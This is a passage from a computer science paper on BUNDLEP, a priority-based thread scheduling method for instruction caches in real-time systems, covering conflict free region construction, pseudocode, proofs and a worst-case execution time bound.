potential cache conflicts within and between threads. Central to BUNDLE’s scheduling decisions and WCETO analysis are conflict free regions. Conflict free regions are created from the control flow graph [19] (CFG) of a ribbon. A control flow graph is a weakly connected directed graph representing the flows of execution through an executable object. Described by a triple \( G = (N, E, h) \) of nodes, edges, and entry instruction. Typically the nodes \( n \in N \) of a CFG are basic blocks, for simplicity of presentation nodes of CFGs within this work are single instructions. The directed edges \( (u, v) \in E \land u, v \in N \) define the possible paths through the program, with \( h \in N \) at the root of all paths, ending in a single terminal node. A conflict free region (CFR) is a subset of nodes and edges from the CFG of a ribbon. The subset is determined by including instructions which, when executed, would not cause an eviction of each other. When a CFR is extracted from the CFG \( G \) the structure of the program is maintained. An extracted CFR is itself a CFG, denoted \( F = (N, E, h) \) with the following properties: 1) No two instructions (outside of the same block) map to the same cache line. 2) All instructions of \( F \) are weakly connected to the entry instruction \( h \). 3) For any two instructions in \( (u, v) \in F \), if there was an edge between them in \( G \) then \( (u, v) \in E \) (of \( F \)). The set of CFRs of a ribbon’s CFG are collected in the ribbon’s conflict free region graph (CFRG). A CFGR \( R = (N, E, h) \) is a CFG where the nodes are CFRs. Connectivity between CFRs from the CFG is preserved in the edges of the CFRG. For an edge \( (n_1, n_2) \) in the CFG, if \( n_1 \) and \( n_2 \) are placed in distinct CFRs, then the CFRG must contain an edge between the CFRs. Figure 1 illustrates the relationships between the CFG, CFRs, and CFRG. \[\begin{align*} \text{CFG} & \quad \text{CFR} & \quad \text{CFRG} \\ \end{align*}\] **Fig. 1:** CFG, CFR, and CFRG of a ribbon It is the CFRG which drives the scheduling decisions of BUNDLE’s algorithm. For each CFR within the CFRG, the scheduling algorithm creates a container for threads called a bundle. Only one bundle is active at any time, and only threads of the active bundle are allowed to execute. If a thread of the active bundle attempts to execute an instruction outside of the active CFR, the thread is blocked. After being blocked, the thread is placed in the bundle of the CFR it attempted to enter. After all threads of the active bundle have blocked, the bundle is depleted and another bundle is selected as active. **Graphical Notation:** Execution under BUNDLE is illustrated in Figure 2. Annotation of the CFRG \( R = (N, E, h) \) will remain consistent with other figures. Nodes \( n_i \in N \) are CFRs, \[\begin{align*} \text{CFG} & \quad \text{CFR} & \quad \text{CFRG} \\ \end{align*}\] \( n_i = (N_i, E_i, h_i) \). The entry instruction \( h_i \) of CFR \( n_i \) has a main memory address, which is denoted \( a_i \). When presented as nodes in graphs, CFRs will be squares and instructions circles. When needed, the CFR shaded light gray indicates its bundle is active. Small black squares adjacent to or within a CFR are the threads of the associated bundle. ![Fig. 2: BUNDLE Execution](image) In Figure 2a, \( n_0 \) is active. Accordingly, BUNDLE executes each of \( n_0 \)'s threads until they leave the CFR, entering \( n_1 \) and \( n_2 \). The next active bundle selected is \( n_3 \) in Figure 2b, its one thread executes until termination. This process repeats until all threads have terminated, and the job has been completed. By restricting execution by CFR (bundle), the execution time of threads are lowered by sharing cached values where they otherwise would not (e.g. letting each thread complete the execution of the entire CFG before switching to the next thread). In BUNDLE [5], the selection of which bundle to activate is arbitrary. Selecting in such a manner can reduce the inter-thread cache benefit, which can be observed in Figure 2. Had \( n_1 \) and \( n_2 \) been activated before \( n_3 \), more threads would have received the benefit when \( n_3 \) was activated. IV. OVERVIEW OF BUNDLEP Arbitrary selection of bundle activation has the deleterious effect of increasing the complexity of WCETO analysis. BUNDLEP addresses both issues of increasing the inter-thread cache benefit, and simplifying WCETO calculation with a single solution: assign priorities to the CFRs of the CFRG. At run-time, a bundle inherits the priority of its associated CFR, and the bundle with the best priority is always activated. ![Fig. 3: BUNDLEP Execution](image) Priorities are assigned to CFRs to guarantee the minimum number of activations, which maximizes the inter-thread cache benefit per activation. Priority assignments are based on the intuition that the terminal node of the CFRG should have the lowest priority. Those nodes immediately preceding the terminal node are given the second lowest, etc. This intuition is illustrated by example in Figure 3. CFR's have their priority listed as superscripts, where the lowest value has the best priority, ie. node \( n_1 \) has priority 1 which is worse than \( n_0 \). Figure 3 revisits the CFRG of Figure 2 to highlight the benefit of prioritizing CFRs. Starting with 3a, the best priority CFR is selected as active (\( n_0 \)) and the bundle is depleted. BUNDLEP's next activation is a choice between \( n_1 \) and \( n_2 \), they have equal priority, either would be a valid choice. The selection of \( n_2 \) is made before \( n_1 \). Figure 3b illustrates only the first choice, omitting depicting the activation of \( n_1 \) in favor of \( n_3 \). Figure 3c shows the clear benefit of priority assignment. The bundle for \( n_3 \) is activated only once for six threads, this maximizes the inter-thread cache benefit which is equivalent to minimizing the number of activations. Compared to Figure 2 where \( n_3 \) could be activated up to four times, possibly quadrupling the cache load penalty for the CFR at run-time and during WCETO analysis. The priority assignment which minimizes the number of activations is shown in Theorem 1 as the longest path value for each node of the CFRG from the initial node given positive edge weights. This influences the creation of CFRs and the treatment of loops in the CFRG. As such, the CFRG must be a DAG, where the assignment of priorities to CFRs is performed in polynomial time with the added benefit of enabling a tractable WCETO analysis. **Theorem 1 (Maximum Bundle Activations).** For a CFRG \( R = (N, E, h) \), which is a DAG, where each node \( n_i \in N \) has priority \( \pi_i \) equal to the length of the longest path from \( h \) to \( n_i \) the bundle \( n_i \) will be activated at most once per job using BUNDLEP. **Proof.** To illustrate a contradiction assume a CFR \( n_i \) is activated more than once. Then there must exist a node \( n_j \) with a worse priority (greater value) \( \pi_j > \pi_i \) on a valid path \( \langle h, ..., n_j, ..., n_i, ... \rangle \). Given that \( R \) is a DAG, there can be no path from \( n_i \) to \( n_j \). Since priorities are assigned equal to the longest path from \( h \) to a node, then \( \pi_j < \pi_i \) contradicting \( \pi_j > \pi_i \). Therefore, \( n_i \) can be activated at most once. V. CONFLICT FREE REGION CREATION To ensure the CFRG of a ribbon is a DAG\(^3\), the process of converting a ribbon’s executable object into a CFG, then CFRs, and finally a CFRG must avoid introducing ambiguity or loops into the CFG or CFRG. To do so, the process is divided into two stages: 1.) create an expanded CFG 2.) create and link CFRs. In Subsection V-A the motivation and definition of expanded CFGs is provided. Subsection V-B details the assignment of individual instructions to CFRs and their compilation into a CFRG. A. Expanded Control Flow Graphs Typically, for a CFG \( G = (N, E, h) \), a node \( n \in N \) is a basic block identified by the memory address of the first instruction of the block. In this work, nodes are individual instructions. However, nodes are not identified by their address. They are identified by their address and call stack. This prevents loops from being introduced into the CFG. Common to other hard real-time programs, ribbons are restricted from including infinite loops, function pointers, 3\( \)CFRG's cannot be a DAG in the presence of user defined loops, to maintain the DAG structure loops are collapsed – which is described in Section VI-C. long jmp’s, or unbounded recursions. With these restrictions in place, it is still possible to create loops and ambiguity in the CFG of the ribbon. As illustrated by Figure 4. ``` 1 procedure a(x, y) 2 c = x 3 x = b(y) 4 y = b(2 + c) 5 return x + y 6 end procedure ``` Listing 1: Procedure a() In Figure 4, Listing 1 is used to generate the two CFGs 4a and 4b. Numbers adjacent to lines in the pseudocode are the line in memory address of the statements. There are no cycles in the procedure, however the CFG in 4a contains a cycle with \(b()\). This is due to nodes of the CFG being identified by their address coupled with two calls to \(b()\). The loop is broken in Figure 4b by identifying each node by the instruction’s address and complete call stack. Identifying instructions in this way preserves the structure of the program, without introducing loops into the CFG. Throughout the remainder of this work, all CFG operations take place over the expanded CFG of ribbons. Where a node \(n \in N\) is identified by its address \(a\) and callstack \(s\) of depth \(k\), \(s = (n_1, n_2, ..., n_k)\). Each entry of the callstack is a node in \(N\), where the first entry is the top of the stack – the node calling \(n\)’s function. In the case of the first instruction \(h\) (and all other nodes reachable without a function call), the callstack has one element \(\emptyset\) indicating no parenting call. Creating an expanded CFG from a ribbon is a straightforward modification of common CFG [20], [21] program analysis. As such, a detailed description of expanded CFG creation is omitted. ### B. Conflict Free Region Assignment A CFG serves as the basis of construction of conflict free regions and subsequently the conflict free region graph. In the previous work [5], a single node of the CFG could belong to multiple CFRs. Nodes of the CFG are excluded from participating in multiple CFRs under BUNDLEP. If nodes from the CFG participated in multiple CFRs, then loops may be introduced into the CFRG. Additionally, WCETO calculation and scheduling decisions developed in this work, rely upon nodes being assigned to exactly one CFR. Section III listed the three requirements of CFRs from [5]. A fourth requirement is added to accommodate BUNDLEP scheduling and WCETO calculation for a CFG \(G = (N, E, h)\) and CFRs \((F_1, F_2, ..., F_f)\) where \(F_i = (N_i, E_i, h_i)\): 4) A node \(n \in N\) is present in at most one CFR: \[ \forall \ k \neq i, n \notin N_k \] Placing a node of the CFG in a single CFR is referred to as assignment. The assignment process relies upon nodes of the expanded CFG being annotated with their call stack and inner-most loop head. A single node may participate in multiple loops (loops embedded within another). All loops have a head; a starting instruction that determines if the loop will repeat. The inner-most loop head of an instruction is the loop head closest to the node in the hierarchy of embedded loops it belongs to, identified by any suitable algorithm [22]. Assignment begins with a bi-level depth first search (DFS). The top-level DFS marks nodes of \(G\) as CFR entry points. The bottom-level DFS marks nodes with their CFR while handling the special cases that could create loops in the CFRG. Both use conflicts to bound their searches and return the set of conflicting nodes as successor nodes to continue the search. The coordinated result of the bi-level searches complete the first stage of assignment, called CFR entry tagging. The top-level DFS procedure \(\text{TAGCFRs}()\) is presented as pseudocode in Algorithm 1. It makes use of a simulated cache \(C\) to identify conflicts, with three notable methods: \(C\).insert() caches a’s block, \(C\).clear() removes all blocks, and \(C\).conflicts() returns true if \(C\).insert() would evict a cached block. #### Algorithm 1 TAGCFRs() ``` 1: \(G = (N, E, h)\) \hspace{1cm} \triangleright \text{ Expanded CFG } G 2: \(C\) \hspace{1cm} \triangleright \text{ Simulated Cache } 3: \text{procedure } \text{TAGCFRs} 4: \hspace{1cm} s.clear() \hspace{1cm} \triangleright \text{ Local stack } 5: \hspace{1cm} v.clear() \hspace{1cm} \triangleright \text{ Visited node array } 6: \hspace{1cm} s.push(h) \hspace{1cm} \triangleright \text{ Starting condition } 7: \hspace{1cm} \text{while not } s.empty() \text{ do} 8: \hspace{1cm} \hspace{1cm} n \leftarrow s.pop() \hspace{1cm} \triangleright \text{ Take a node } 9: \hspace{1cm} \hspace{1cm} v[n] \leftarrow \text{true} \hspace{1cm} \triangleright \text{ Mark the node as visited } 10: \hspace{1cm} \hspace{1cm} C.clear() \hspace{1cm} \triangleright \text{ Reset the cache } 11: \hspace{1cm} \hspace{1cm} X \leftarrow \text{LABELNODES}(n) \hspace{1cm} \triangleright \text{ Label CFR nodes } 12: \hspace{1cm} \hspace{1cm} \text{for } x \in X \text{ do} 13: \hspace{1cm} \hspace{1cm} \hspace{1cm} s.push(x) \text{ if not } v[x] \hspace{1cm} \triangleright \text{ Conflict begins a CFR } 14: \hspace{1cm} \hspace{1cm} \text{end for} 15: \hspace{1cm} \hspace{1cm} \text{end while} 16: \hspace{1cm} \hspace{1cm} \triangleright v[n] = \text{true} \text{ indicates } n \text{ is a CFR entry.} 17: \text{end procedure} ``` The \(\text{TAGCFRs}()\) procedure is responsible for tracking the entry instructions of CFRs. It resembles a typical DFS, marking nodes as visited, and adding them to the search list when they have not been visited. Where \(\text{TAGCFRs}()\) differs is the selection of subsequent nodes. In a typical DFS, the subsequent nodes are the immediate successors of the current node, in \(\text{TAGCFRs}()\) the subsequent nodes are the entry instructions of successive CFRs. Those entry instructions are determined by the \(\text{LABELNODES}()\) method. Since no CFR may contain a cache conflict, any instruction that would conflict must be the entry instruction of a subsequent CFR. Figure 5 provides an example call to \textsc{LabelNodes}(n_3), \(n_3\) is the entry instruction of the current CFR and \textsc{LabelNodes}(n_3) returns the set of entry instructions for subsequent CFRs \(\{n_1,n_4,n_5\}\). Placed below each node in the figure is the cache block it maps to. ![Diagram of cache blocks](image) \textbf{Fig. 5: Call to \textsc{LabelNodes}(n_3) Returning X} In addition to returning the entry instructions of subsequent CFRs, the \textsc{LabelNodes()} procedure is responsible for marking nodes of the CFG with the CFR they belong to. In Figure 5 the nodes \(\{n_3,n_4,n_5,n_6\}\) are labeled with their CFR \(n_3\). The pseudocode for \textsc{LabelNodes()} is given in Algorithm 2. \begin{algorithm}[H] \caption{\textsc{LabelNodes()}} \begin{algorithmic}[1] \State \(G = (N,E,h)\) \Comment{CFG \(G\), shared with \textsc{TagCFRs}()} \State \(C\) \Comment{Simulated cache, shared with \textsc{TagCFRs}()} \Procedure{\textsc{LabelNodes}}{(n)} \State \(s,x\) \Comment{Local stacks (not shared with \textsc{TagCFRs}())} \State \(v\) \Comment{Local visited array (not shared with \textsc{TagCFRs}())} \If {\(n.\text{label} \neq \emptyset\)} \Comment{Breaking an existing CFR} \State \(\ell \leftarrow n.\text{label}\) \EndIf \State \(s.\text{push}(n)\) \While {not \(s.\text{empty}()\)} \State \(u \leftarrow s.\text{pop}()\) \If {\((n.\text{isHead()} \land \text{not } n.\text{inLoop}(u))\)} \Comment{Case 1, Loop Exit} \State \(u.\text{label} \leftarrow n.\text{label} \land \ell\) \Comment{Case 2, Loop Head} \EndIf \EndWhile \State \(x.\text{push}(u)\) \Comment{Push the Conflict} \State \(v[u] \leftarrow \text{true}\) \Comment{Skip \(u\)’s successors.} \EndProcedure \end{algorithmic} \end{algorithm} During each iteration of the DFS within \textsc{LabelNodes}(), a candidate node \(u\) is deemed within the CFR or an entry instruction of a subsequent CFR. If \(u\) is within the CFR, the node is labeled with the CFR’s initial instruction \(n\), and \(u\)’s successors are added to the search list \(s\). If \(u\) is an entry instruction it is placed in the set of conflicts \(x\), and no successors of \(u\) are added to \(s\). When the search list is empty, the set of conflicts \(x\) is returned to the caller. There are four cases in \textsc{LabelNodes}() when the node \(u\) may be deemed a conflict. The simplest is Case 4, when \(u\) conflicts with another value present in the cache. Since CFRs must contain no conflicts, \(u\) cannot be added to the CFR \(n\). Case 1 and 2 are related to loops. If \(u\) falls under Case 1, then \(n\) is a loop-head to which \(u\) does not belong. Since \(u\) was reachable from some instruction in the CFR \(n\), it must be an exit point of the loop and will not be permitted as part of the CFR. If \(u\) falls into Case 2, then \(n\) is a loop-head. Loops are collapsed (described in Section VI) to ensure the CFRG is a DAG. To permit collapsing, loop-heads must start CFRs and CFRs must only contain instructions of the same loop. Case 3 provides two necessary forms of protection. The first is against loops being added to the CFRG (ie. the fourth CFR requirement). The second is to prevent the nodes of a CFR becoming disconnected. For the WCETO method each CFR must have a single WCET path, which will not exist if the CFR is not weakly connected. Figure 6 compares the result if Case 3 was not present versus it being present. Divided into four parts, Figure 6a is a snapshot of the CFRG from the \textsc{TagCFRs}() procedure’s perspective after calling \textsc{LabelNodes}(n_1) before calling... LABELNODES(n2); the top half is the CFG, the bottom half is the resulting CFRG. Figure 6b shows the result of calling LABELNODES(n2) without Case 3 in place, creating both a disconnected CFR n1 and a loop in the CFRG between n1 and n2. Figure 6c is the result of calling LABELNODES(n2) with Case 3 protection. With the protection in place when LABELNODES(n2) returns to TAGCFR3(), it returns \{n3\} as the set of entry points for subsequent CFRs. There is a an issue to be resolved with respect to n3 in Figure 6c. Before the call n3 was previously assigned to the CFR n1, but is now an entry node to a new CFR. As previously stated, a node must reside in exactly one CFR. Case 3 resolves this issue as well in Figure 6d, the result of calling LABELNODES(n3). When the TAGCFR3() procedure returns, tagging has been completed. All nodes of the CFG have been assigned to CFRs given by their n.label. What remains to complete the CFRG is to add edges between CFRs. This final stage is referred to as linking. Pseudocode for linking is omitted due to the simplicity of the operation; a DFS of the CFG where unique labels are added to the CFRG as nodes, and edges added when edges in the CFG have differing labels at the end points. The result is a CFRG \( R = (N, E, h) \), where \( N \) is the set of CFRs, \( E \) the edges between CFRs, and \( h \) the entry CFR. For consistency and clarity, a CFR \( F_i \) is identified by its entry node in the CFG \( n_i \), so is the corresponding node in the CFRG. For example, in Figure 6 the node in the CFRG and the CFR n3 is labeled so because its entry instruction was \( n_3 \) from the CFG. VI. BUNDLEP After converting a CFG to a CFRG, priorities are assigned to CFRs to minimize the number of activations of each bundle. At run-time, the BUNDLEP scheduling algorithm relies on some hardware mechanism that halts threads attempting to execute the entry instruction of an inactive CFR. Such a mechanism was proposed in [23]: it relied on cache evictions rather than thread execution, making it unsuitable for BUNDLEP. This section proposes a new conflict interrupt mechanism suitable for halting threads. The XFLICT interrupt behavior closely matches that of hardware breakpoints [24]. A. Hardware Support The XFLICT interrupt represents the attempted execution of an instruction that may result in a cache conflict. Since the execution may or may not result in a conflict, the conclusion that an interrupt should be raised cannot be made without additional information. That additional information is encoded in the XFLICT TABLE. When the program counter is set to a value present in the XFLICT TABLE, the proposed hardware mechanism halts the CPU before executing the instruction and raises an XFLICT interrupt carrying ancillary data encoding the address of the instruction that raised it. To illustrate how the interrupt, table, and scheduling algorithm work together the process of activating n2 is illustrated below. In Figure 7a, n1 has been depleted and its two threads have moved to n3 where they are blocked. The BUNDLEP scheduling algorithm will now select n2 as active and begin executing threads. Before n2 is activated, the XFLICT TABLE (abbreviated X in the figure) is cleared, and the values are replaced with the addresses of the entry instructions of the subsequent CFRs of n2: \( (a_3, a_4) \) – recall every node of the CFG is identified by its address \( a \) and stack \( s \), CFRs are identified by their entry nodes from the CFG, in this case \( n_3 \) and \( n_4 \). In Figure 7b, n2 has been activated and threads are permitted to execute. When any thread attempts to execute either \( a_3 \) or \( a_4 \), the XFLICT interrupt is raised before the thread can execute it. The BUNDLEP scheduling algorithm receives the interrupt, blocks the thread, and places it into the correct bundle. Figure 7c provides a snapshot of execution after the first two threads of n2 have exited the bundle and are blocked awaiting the activation of \( n_3 \) or \( n_4 \). B. BUNDLEP’s Scheduling Algorithm Incorporation of the XFLICT interrupt and priorities into BUNDLEP scheduling is given by Algorithm 3, the pseudocode for BUNDLEP. Bundles are stored in the array \( B \), indexed by the nodes of the CFRG \( R \). A single bundle \( b \) has four members: a starting address \( b.a, \) node from the CFRG \( b.n, \) priority \( b.p, \) and set of threads \( b.t \). When a bundle is ready, it is placed in the priority queue \( P \). Lines 6-8 are responsible for adding the threads of the job to the initial bundle and adding the bundle to the priority queue. Each iteration of the outer while loop starting on line 9 removes the best priority bundle from the queue and activates it. Lines 10-17 manage the XFLICT TABLE and a local mapping from address to CFRG node. Addresses of successors to \( b \) are added to the XFLICT TABLE so that interrupts will be delivered when threads exit \( b \). However, those addresses may map to more than one CFR. To avoid ambiguity, the \( S \) array maps addresses of successor CFRs to their proper node in the CFRG. The inner for loop starting on line 18, executes each thread of the active bundle. When an XFLICT interrupt is raised, the thread is placed in the successor’s bundle and added to the priority queue as a candidate for activation. If the interrupt is not raised, the thread has terminated and belongs to no bundle. It is appropriate to mention the data structures used for bundles and threads at this point. Threads of bundles are removed... Algorithm 3 BUNDLEP Scheduling Algorithm 1: \( T \triangleright \) Set of Threads 2: \( R = (N, E, h) \triangleright \) Conflict Free Region Graph 3: \( P \triangleright \) Priority Queue of Ready Bundles 4: \( B \triangleright \) Array of bundles indexed by their node \( n \in N \) 5: \textbf{procedure} BUNDLEP 6: \quad \textbf{if} \( b \in B[h] \) \textbf{then} 7: \quad \quad \textbf{b.t.add(T)} 8: \quad \textbf{P.insert(b, b.\pi)} 9: \quad \textbf{while} \( b \leftarrow P.\text{removeMax}() \) \textbf{do} \textbf{Best Bundle} 10: \quad \quad \textbf{S} \leftarrow \emptyset \triangleright \text{Clear the successor array} 11: \quad \quad \textbf{XFLICT_CLEAR()} \triangleright \text{Clear the XFLICT table} 12: \quad \quad \textbf{do} \triangleright \text{Create the mapping of address to node} 13: \quad \quad \quad \textbf{for} \( s \in R.\text{succs}(b.n) \) \textbf{do} 14: \quad \quad \quad \quad \textbf{b}_{n} \leftarrow B[s] 15: \quad \quad \quad \quad \textbf{S}[b_{n}, a] \leftarrow b_{n} 16: \quad \quad \quad \textbf{XFLICT_ADD(b_{n}, a)} 17: \quad \quad \textbf{end for} 18: \quad \quad \textbf{for} \( t \in b.t \) \textbf{do} 19: \quad \quad \quad \textbf{try} \{ \textbf{RUN(t)} \} 20: \quad \quad \quad \textbf{catch} \text{XFLICT x} \{ \textbf{Get the next bundle} \} 21: \quad \quad \quad \quad \textbf{b}_{\text{next}} \leftarrow S[x.a] 22: \quad \quad \quad \quad \textbf{b}_{\text{next}}.\text{add(t)} 23: \quad \quad \quad \quad \textbf{P.insert(b}_{\text{next}, b_{\text{next}}.\pi)} 24: \quad \quad \quad \textbf{next for} \triangleright t \text{ has not terminated} 25: \quad \quad \textbf{end try} 26: \quad \textbf{end for} 27: \textbf{end while} 28: \textbf{end procedure} on line 18, the order is irrelevant requiring nothing more than an array with \( \mathcal{O}(1) \) time for extraction. Bundle activation order is important, being removed from a priority queue on line 9. An efficient implementation using a Fibonacci heap has complexity \( \mathcal{O}(1) \) for insertions and amortized complexity \( \mathcal{O}(\log n) \) for removeMax. Thus each iteration of the while loop is dominated by the removeMax operation, which will be accounted for in the WCETO analysis of Section VII. C. Priority Assignment Priorities are assigned to CFRs during the offline object analysis based on their longest path value from the entry CFR \( h \). The priority assignment method requires the CFRG to be a DAG. This requirement is impossible to meet in all circumstances. Although the analysis does not introduce loops, the program structure may contain them. These \textit{user defined} loops may be contained within a single CFR, which would ease the analysis, or they may span multiple CFRs creating a necessary loop in the CFRG. The structure of CFRs from user defined loops allows them to be collapsed into a single \textit{false} node. Every loop has a head, members, and at least one exit CFR. The loop head identifies all members of the loop, which are \textit{collapsed} into a single false node during priority assignment and WCETO calculation. Priorities are first assigned to the interior nodes, then assigned the false node in the greater \textit{scope}. Figure 8 illustrates two scopes of loop collapse. In Figure 8a, at the greatest scope there is a single loop which is collapsed into a single false node \( n_1 \). As part of being collapsed, the interior nodes are assigned priorities corresponding to their longest path from the loop head. The false node is given a priority according to the longest path to reach it from the entry node, with two caveats. First, the interior real (ie., not false) node that is the loop head must have a priority worse than all other members of the loop. Second, each false node is given a unique priority within its scope, this guarantees only members of the loop execute until all threads exit the loop. This is why the false node \( n_1 \) denoted by a hexagon has priority 4, which is inherited by the loop head. \begin{figure}[h] \centering \includegraphics[width=0.8\textwidth]{figure8.png} \caption{Loop Collapse and False Nodes} \end{figure} Figure 8b illustrates a smaller scope of embedded loop collapse. The inner loop is processed first, which affects the priority values of members within the outer loop. By repeatedly collapsing loops into false nodes, all loops are removed and the CFRG is converted to a DAG. Additionally, at each scope within a collapsed node the graph structure is also DAG (when excluding the incoming edges to the loop head). Assigning priorities to interior nodes of the same scope equal to their longest path from the loop head (with the worst priority) guarantees each CFR is activated at most once per iteration shown in Theorem 2. Theorem 2 (Maximum Bundle Activations per Iteration). For a graph of the collapsed node \( G=(N,E,n_0) \) with loop head \( n_0 \), set of in-scope nodes \( N \) and edges \( E \), where each node \( n \in N \) has priority \( \pi \), equal to the longest path from \( n_0 \) to \( n \), and \( n_0 \) has priority worse than all others \( \{ \pi_0 \mid \forall n_j \in N, \pi_0 > \pi_j \} \) the bundle \( n_0 \) will be activated at most once per iteration of \( n_0 \). \textbf{Proof.} \textbf{Observation I:} For a node \( n_k \) in scope of \( n_0 \) that is a loop head, \( n_k \) will be collapsed with all other nodes that have \( n_k \) as their inner-most loop head. Only the collapsed node \( n_k \) will be in scope of \( n_0 \). Therefore, for any collapsed node, there is exactly one loop in scope with head \( n_0 \). \textbf{Observation II:} A single iteration of the loop contained within a collapsed node is defined as the series of activations that begins with the activation of \( n_0 \) and ends just before \( n_0 \) would be selected as active once again. Since \( n_0 \) has the worst priority among all in-scope nodes, all other nodes must have been depleted before \( n_0 \) could be activated again. **Observation III:** All other threads not in the loop of \( n_0 \) must be in bundles with worst priority than any bundle in the current scope. (Otherwise, bundles in \( n_0 \)'s scope would not be scheduled.) Thus, the current loop (and embedded loops) will complete all iterations before any out-of-scope bundle is executed. Consider the graph \( G \) where the incoming edges to \( n_0 \) have been removed, removing the cycle, i.e., \( E = \{ (u, v) | (u, v) \neq n_0 \} \in E \) as a graph \( G = (N, E, n_0) \). By Observation I, \( G \) is now a DAG of CFRs. Treating a single iteration as a job release and applying Theorem 1 to \( G \), each \( n \in N \) is activated at most once per iteration for all threads executing the loop. \( \square \) **VII. BUNDLEP WCETO CALCULATION** As a practical effort, the focus of this work is on the calculation of an effective, safe WCETO bound. To that goal, the bound calculation is formulated as an integer linear program (ILP) the number of variables grow at \( O(V + E) \). This section is devoted to describing the transformation of a CFRG into a set of constraints and an objective function. Assigning priorities to nodes of the CFRG and collapsing loops (as described in Section VI) guarantees each node is activated at most once. As such, the contributions of individual nodes may be considered in isolation. What determines a node’s individual contribution is the number of threads assigned to it. The maximization problem becomes defining the greatest sum of contributions of individual nodes for a valid assignment of threads. Figure 9 illustrates the relationship between the CFRG, WCETO of individual nodes \( \omega_{n}(t_{n}) \), and objective function \( \Omega = \sum_{n \in N} \omega_{n}(t_{n}) \). Refer to Figure 13 in the appendix for a more detailed example. ![Fig. 9: CFRG Individual Nodes and ILP Objective](image) The WCETO of a node \( \omega_{n}(t_{n}) \) depends on the number of threads assigned to it \( t_{n} \). For real nodes, the function takes the form of Equation 1. We assume a timing-compositional architecture [25]: the number of cycles required to complete a single node is divided into two parts: the memory demand and the execution demand. The memory demand of a node \( n \) is the product of the set of ECBs found in the CFR \( ECB_{n} \) and the block reload time \( B \). The execution demand is the product of the worst-case execution time of a single thread over the node \( c_{n} \) and the number of threads assigned \( t_{n} \). Two context switch costs are included to reflect the penalty of BUNDLEP scheduling, \( X_b \) is the number of cycles required to switch to a new active bundle, and \( X_t \) is the cost of selecting a thread from the active bundle. The costs \( X_b \) and \( X_t \) are directly related to lines 9 and 18 of Algorithm 3. \[ \omega_{n}(t_{n}) = \begin{cases} 0, & t_{n} = 0 \\ c_{n} \cdot t_{n} \cdot X_t + X_b + \gamma_{n}, & t_{n} \geq 1 \end{cases} \quad (1) \] The WCETO for false nodes is given in Equation 2. It depends on \( \omega_{n} \) the maximum number of iterations of the loop collapsed into the false node \( n \), and \( inscope(n) \). The set of nodes returned by \( inscope(n) \) are the interior nodes of the false node \( n \), which may include other false nodes. For example in Figure 8b, \( inscope(n_1) = \{n_1, n_2, n_3, n_5\} \) where \( n_1 \) is a real node and \( n_3 \) a false node. \[ \omega_{n}(t_{n}) = \begin{cases} 0, & t_{n} = 0 \\ \sum_{i \in inscope(n)} \omega_{i}(t_{i}), & t_{n} \geq 1 \end{cases} \quad (2) \] The memory and execution demand of a false node are not entirely separable. Individual nodes within scope of \( n \) have their per-iteration context switch contribution bounded by \( \omega_{i}(t_{i}) \), described later. An initial memory demand for the false node \( n \) is calculated as \( \gamma_{n} \). It represents the number of cycles required to cache all blocks of nodes within the collapsed node regardless of scope. The set of nodes \( allscope(n) \) includes any real node that has been collapsed under \( n \). Using Figure 8b, \( allscope(n_1) = \{n_1, n_2, n_3, n_4, n_5\} \) where no node is false. Using the set of all nodes collapsed under \( n \), the multi-set union of their ECBs is formed and labeled \( ECB_{n} = \bigcup_{i \in allscope(n)} ECB_{i} \). The product of cardinality of the ECB multiset and the block reload time produces \( \gamma_{n} = B \cdot |ECB_{n}| \). This value accounts for all of the cycles required to load every cache block found in the collapsed node. For a false node \( i \) collapsed under a false node \( n \), its WCETO contribution \( \omega_{i}(t_{i}) \) is defined by Equation 2. For a real node \( i \) under a false node \( n \), its WCETO contribution \( \omega_{i}(t_{i}) \) is given by Equation 3. It includes context switch costs, execution demand, and the worst-case memory demand. A method similar to the ECB-Union CRPD approach [2] is employed to calculate the memory demand from the perspective of the affected node \( i \). The worst-case occurs when another real node collapsed under \( n \) evicts the ECBs of \( i \), forcing the blocks \( ECB_{i} \) to be loaded when \( i \) is activated. The number of evictions can be bounded by the ECBs of all loop members, specifically those that occur more than once in the loop. The set of ECBs found more than once under the collapsed node are given by \( ECB_{n} = \bigcup_{k \in \epsilon_{ECB_{n}} \cap ECB_{n}} B \). Thus, the memory demand bound for \( i \) is \( \gamma_{i} = |ECB_{n} \cap ECB_{i}| \cdot B \). Incorporating per-iteration context switches, execution and memory demand into the bound for \( i \) yields Equation 3. \[ \omega_{i}(t_{i}) = \begin{cases} 0, & t_{n} = 0 \\ X_b + X_t \cdot t_{i} \cdot c_{i} + \gamma_{i}, & t_{n} \geq 1 \end{cases} \quad (3) \] A valid assignment of threads takes into account the structure of the CFRG. To reflect the structure, threads are treated as flow traversing the edges of nodes. The entry node is treated as the source of flow, providing a total of \( m \) threads on its outgoing edges. All threads much reach the terminal node. At each node the sum of threads along incoming edges and outgoing edges must be equal (except the entry and terminal nodes). The ILP finds the assignment of threads according to the flow of the CFRG which maximizes the number of cycles required to complete \( m \) threads according to BUNDLEP scheduling, thus bounding the WCET of a job. To conserve space in the main body of the work, the details of transforming the formulation to ILP constraints is placed in Appendix A. ### VIII. Evaluation The evaluation takes the approach of comparing BUNDLEP’s thread-level scheduling algorithm to a naive algorithm which executes threads one after another (serially). Individual benchmarks from the Mälardalen [26] MRTC suite are treated as ribbons releasing \( m \) threads per job. The WCET of each job is analyzed twice, once for a single multi-threaded task scheduled by BUNDLEP, and again for \( m \) serial threads by Heptane. Similarly, the run-time behavior is collected for each benchmark under BUNDLEP and serial execution. A fully functional virtual machine with the tools and source is available for download to recreate these results or expand upon them [9]. Ideally, BUNDLEP would also be compared with BUNDLE. However, the evaluation in [5] used synthetic programs rather than compiled source (for any architecture). WCETO analysis for BUNDLE is also intractable with complexity \( \mathcal{O}(\prod_j |N_j|^m) \). This is due to the nature of the algorithm, it does not restrict the flow of threads through the CFRG, which demands all-paths be repeatedly searched. A novel BUNDLE WCETO implementation of an intractable solution, which is known to be dominated by BUNDLEP is not compelling, as such it is omitted from the evaluation. The target platform for WCETO analysis and execution is a MIPS 74K processor with a direct mapped single level instruction cache. Cache blocks are restricted to 32 bytes. The CPI \( \mathbb{B} \), block reload time \( \mathbb{B} \), and number of cache blocks \( \ell \) vary based on Table I. Additionally, the number of threads per job \( m \) vary from 1 to 16 by powers of two. Jobs are executed on a MIPS simulator provided by Heptane and modified to execute BUNDLEP scheduling or a serial batch of threads. <table> <thead> <tr> <th>CPI (( \mathbb{B} ))</th> <th>BRT (( \mathbb{B} ))</th> <th>( \ell )</th> <th>( m )</th> </tr> </thead> <tbody> <tr> <td>( 1 